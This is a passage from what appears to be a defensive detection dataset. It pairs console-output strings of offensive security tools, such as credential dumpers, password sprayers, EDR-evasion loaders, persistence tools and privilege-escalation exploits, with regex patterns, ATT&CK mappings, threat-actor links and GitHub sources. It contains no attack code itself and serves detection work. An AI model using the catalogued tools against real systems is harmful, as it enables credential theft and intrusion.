Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","20020" "*] Enable Persistence (Y/n): 
*",".{0,1000}\]\sEnable\sPersistence\s\(Y\/n\)\:\s.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","20021" "*] Enjoy your creds! Reverting to self*",".{0,1000}\]\sEnjoy\syour\screds!\sReverting\sto\sself.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","20022" "*] Eventviewer Persistence created*",".{0,1000}\]\sEventviewer\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20023" "*] Executing loaded Mimikatz PE*",".{0,1000}\]\sExecuting\sloaded\sMimikatz\sPE.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","20024" "*] executing xss local file write to hijack systemd user*",".{0,1000}\]\sexecuting\sxss\slocal\sfile\swrite\sto\shijack\ssystemd\suser.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20025" "*] Extension Hijacking Persistence created*",".{0,1000}\]\sExtension\sHijacking\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20026" "*] Fetching LLVM-Obfuscator ?*",".{0,1000}\]\sFetching\sLLVM\-Obfuscator\s\?.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","20027" "*] Found kerberoastable users: *",".{0,1000}\]\sFound\skerberoastable\susers\:\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - 
TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","20028" "*] Found non-ASCII service: *",".{0,1000}\]\sFound\snon\-ASCII\sservice\:\s.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","20029" "*] going to escalate the quantum privilege of wifi driver*",".{0,1000}\]\sgoing\sto\sescalate\sthe\squantum\sprivilege\sof\swifi\sdriver.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20030" "*] going to inject sql payload into the external mainframe smart contract interface*",".{0,1000}\]\sgoing\sto\sinject\ssql\spayload\sinto\sthe\sexternal\smainframe\ssmart\scontract\sinterface.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20031" "*] Granting read and execute to SYSTEM on DLL: *",".{0,1000}\]\sGranting\sread\sand\sexecute\sto\sSYSTEM\son\sDLL\:\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler 
Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","20032" "*] GS login detected. Total Users: *",".{0,1000}\]\sGS\slogin\sdetected\.\sTotal\sUsers\:\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","20033" "*] GS logout detected. Remaining Users: *",".{0,1000}\]\sGS\slogout\sdetected\.\sRemaining\sUsers\:\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","20034" "*] Harvesting [%d] Contacts*",".{0,1000}\]\sHarvesting\s\[\%d\]\sContacts.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","20035" "*] Hidden task xml file: *",".{0,1000}\]\sHidden\stask\sxml\sfile\:\s.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled 
tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","20036" "*] In medium integrity but user is a local administrator- UAC can be bypassed.*",".{0,1000}\]\sIn\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20037" "*] In medium integrity but user is a local administrator- UAC can be bypassed.*",".{0,1000}\]\sIn\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed\..{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20038" "*] INFO: DLL IS VULNERABLE TO DOWNLOADS INSTALLER TEST-*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sDOWNLOADS\sINSTALLER\sTEST\-.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - 
T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","20039" "*] INFO: DLL IS VULNERABLE TO EXECUTABLE TEST*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sEXECUTABLE\sTEST.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","20040" "*] Injecting into remote process using direct syscalls*",".{0,1000}\]\sInjecting\sinto\sremote\sprocess\susing\sdirect\ssyscalls.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","20041" "*] Injecting into remote process using direct syscalls*",".{0,1000}\]\sInjecting\sinto\sremote\sprocess\susing\sdirect\ssyscalls.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","20042" "*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20043" "*] Injecting remote shellcode*",".{0,1000}\]\sInjecting\sremote\sshellcode.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","20044" "*] Kerberoast user * successfully!*",".{0,1000}\]\sKerberoast\suser\s.{0,1000}\ssuccessfully!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","20045" "*] Killing EventLog Threads (if running)*",".{0,1000}\]\sKilling\sEventLog\sThreads\s\(if\srunning\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","20046" "*] Leak of complete Priv token successful!*",".{0,1000}\]\sLeak\sof\scomplete\sPriv\stoken\ssuccessful!.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","20047" "*] Listing all vulnerabilities scanned by Moriarty*",".{0,1000}\]\sListing\sall\svulnerabilities\sscanned\sby\sMoriarty.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","20048" "*] Listing GraphRunner modules?*",".{0,1000}\]\sListing\sGraphRunner\smodules\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","20049" "*] LLMNR sniffer identified potential spoofing target:*",".{0,1000}\]\sLLMNR\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20050" "*] LLMNR Sniffer identified previously sniffed name*",".{0,1000}\]\sLLMNR\sSniffer\sidentified\spreviously\ssniffed\sname.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that 
enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20051" "*] Modifying * attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\s.{0,1000}\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20053" "*] Modifying gPCFileSysPath attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\sgPCFileSysPath\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20054" "*] Now spraying EAS portal at https://*/Microsoft-Server-ActiveSync*",".{0,1000}\]\sNow\sspraying\sEAS\sportal\sat\shttps\:\/\/.{0,1000}\/Microsoft\-Server\-ActiveSync.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","20055" "*] Number of available credentials: 
%zu*",".{0,1000}\]\sNumber\sof\savailable\scredentials\:\s\%zu.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","20056" "*] Password spraying has begun with *",".{0,1000}\]\sPassword\sspraying\shas\sbegun\swith\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","20057" "*] Password spraying is complete*",".{0,1000}\]\sPassword\sspraying\sis\scomplete.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","20058" "*] Powershell Persistence created*",".{0,1000}\]\sPowershell\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20059" "*] QueueUserAPC Inject shellcode completed, enjoy!*",".{0,1000}\]\sQueueUserAPC\sInject\sshellcode\scompleted,\senjoy!.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - 
T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#content","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","20060" "*] Received DCOM NTLM type 3 authentication from the privileged client*",".{0,1000}\]\sReceived\sDCOM\sNTLM\stype\s3\sauthentication\sfrom\sthe\sprivileged\sclient.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","20061" "*] Received RCON challenge: *",".{0,1000}\]\sReceived\sRCON\schallenge\:\s.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#content","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","20062" "*] Retrieving the S4U2Self referral from *",".{0,1000}\]\sRetrieving\sthe\sS4U2Self\sreferral\sfrom\s.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20064" "*] Roasted hashes written to : *",".{0,1000}\]\sRoasted\shashes\swritten\sto\s\:\s.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20065" "*] Screensaver Persistence created*",".{0,1000}\]\sScreensaver\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20067" "*] Sending credentials to pastebin ..*",".{0,1000}\]\sSending\scredentials\sto\spastebin\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20068" "*] sending network-based smb hypertrojan with credentials*",".{0,1000}\]\ssending\snetwork\-based\ssmb\shypertrojan\swith\scredentials.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20069" "*] Sending S4U2proxy request *",".{0,1000}\]\sSending\sS4U2proxy\srequest\s.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate 
Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","20070" "*] Shellcode Decryption Started*",".{0,1000}\]\sShellcode\sDecryption\sStarted.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","20071" "*] Spoofing gPLink to *",".{0,1000}\]\sSpoofing\sgPLink\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20072" "*] Starting admin grpc server on port: *",".{0,1000}\]\sStarting\sadmin\sgrpc\sserver\son\sport\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","20073" "*] Starting agent node actively.Connecting to *Reconnecting every * 
seconds*",".{0,1000}\]\sStarting\sagent\snode\sactively\.Connecting\sto\s.{0,1000}Reconnecting\severy\s.{0,1000}\sseconds.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","20074" "*] Starting client grpc server on port: *",".{0,1000}\]\sStarting\sclient\sgrpc\sserver\son\sport\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","20075" "*] Starting GraphSpy. Open in your browser by going to the url displayed below.*",".{0,1000}\]\sStarting\sGraphSpy\.\sOpen\sin\syour\sbrowser\sby\sgoing\sto\sthe\surl\sdisplayed\sbelow\..{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","20076" "*] Starting nullinux setup script*",".{0,1000}\]\sStarting\snullinux\ssetup\sscript.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux #content","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","20077" "*] Starting RogueOxidResolver RPC Server listening on 
port*",".{0,1000}\]\sStarting\sRogueOxidResolver\sRPC\sServer\slistening\son\sport.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","20078" "*] Starting share enumeration with thread limit of *",".{0,1000}\]\sStarting\sshare\senumeration\swith\sthread\slimit\sof\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","20079" "*] Starting the NTLM relay attack, launch ntlmrelayx on *",".{0,1000}\]\sStarting\sthe\sNTLM\srelay\sattack,\slaunch\sntlmrelayx\son\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","20080" "*] Starting the RPC server to capture the credentials hash from the user authentication!!*",".{0,1000}\]\sStarting\sthe\sRPC\sserver\sto\scapture\sthe\scredentials\shash\sfrom\sthe\suser\sauthentication!!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege 